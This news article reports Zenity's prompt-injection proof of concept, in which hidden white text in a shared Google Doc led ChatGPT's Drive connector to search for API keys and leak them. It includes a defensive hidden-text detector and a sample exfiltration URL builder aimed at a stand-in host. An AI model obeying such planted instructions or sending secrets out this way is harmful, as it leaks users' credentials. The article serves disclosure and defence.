An invisible prompt in a Google Doc made ChatGPT access data from a victim’s Google Drive
Key Points
- Security researchers at Zenity showed that a single manipulated Google Doc, containing an invisible prompt, could make ChatGPT automatically extract and leak sensitive data from a user's Google Drive—without the user needing to take any action.
- The attack worked by exploiting OpenAI's "Connectors" feature, which links ChatGPT to services like Gmail and Microsoft 365. When the manipulated document appeared in a user's Drive, even a simple request could trigger the extraction and exfiltration of data such as API keys.
- OpenAI responded quickly to patch the specific vulnerability, but researchers note that as LLMs become more common in workplaces, similar attack methods remain technically possible and the risk of such exploits is likely to grow.
A single manipulated document was enough to get ChatGPT to automatically extract sensitive data—without any user interaction.
Security researchers at Zenity demonstrated that users could be compromised simply by having a document shared with them; no action was required on their part for data to leak. In their proof of concept, a Google Doc containing an invisible prompt—white text in font size 1—was able to make ChatGPT access data stored in a victim's Google Drive. The attack exploited OpenAI's "Connectors" feature, which links ChatGPT to services like Gmail or Microsoft 365.
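To make the mechanism concrete, here is a minimal sketch of how such near-invisible text could be flagged in a document's underlying structure. It assumes the JSON layout returned by the Google Docs API (for example via `documents().get()` in the official Python client); the field names follow that API, but the thresholds and the check itself are illustrative, not part of Zenity's published research.

```python
def find_hidden_text(document: dict) -> list[str]:
    """Flag text runs styled to be effectively invisible (white text, tiny font).

    `document` is assumed to be the dict returned by the Google Docs API,
    e.g. service.documents().get(documentId=doc_id).execute().
    """
    suspicious = []
    for element in document.get("body", {}).get("content", []):
        for part in element.get("paragraph", {}).get("elements", []):
            run = part.get("textRun")
            if not run:
                continue
            style = run.get("textStyle", {})
            rgb = (
                style.get("foregroundColor", {})
                .get("color", {})
                .get("rgbColor", {})
            )
            # Near-white foreground color ...
            is_white = all(rgb.get(c, 0) > 0.95 for c in ("red", "green", "blue"))
            # ... combined with a tiny font size is a strong hint of hidden content.
            is_tiny = style.get("fontSize", {}).get("magnitude", 11) <= 1
            if is_white and is_tiny:
                suspicious.append(run.get("content", "").strip())
    return suspicious
```

Spotting the styling is the easy part; the core problem remains that the model treats whatever text it reads as potential instructions.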
If the manipulated document appears in a user's Drive, either through sharing or accidental upload, even a harmless request like "Summarize my last meeting with Sam" could trigger the hidden prompt. Instead of providing a summary, the model would search for API keys and embed them in a URL pointing to an external server.
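The exfiltration step needs nothing more than a URL that carries the secret as part of the request. A minimal sketch of the pattern, with a made-up host and parameter name rather than anything from the actual payload:

```python
from urllib.parse import quote

# "attacker.example" and the "q" parameter are hypothetical; the point is only
# that the secret leaves the victim's environment as soon as the URL is
# fetched or rendered, because it travels inside the request itself.
COLLECTOR = "https://attacker.example/collect"

def exfiltration_url(secret: str) -> str:
    return f"{COLLECTOR}?q={quote(secret)}"

print(exfiltration_url("sk-EXAMPLE-key"))
# https://attacker.example/collect?q=sk-EXAMPLE-key
```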
Growing use of LLMs in the workplace creates new attack surfaces
OpenAI was notified in advance and quickly patched the specific vulnerability demonstrated at the Black Hat conference. The exploit was limited in scope: entire documents could not be transferred, and only small amounts of data could be exfiltrated.
Despite the fix, the underlying attack method remains technically possible. As LLMs are increasingly integrated into workplace environments, researchers warn that the attack surface continues to expand.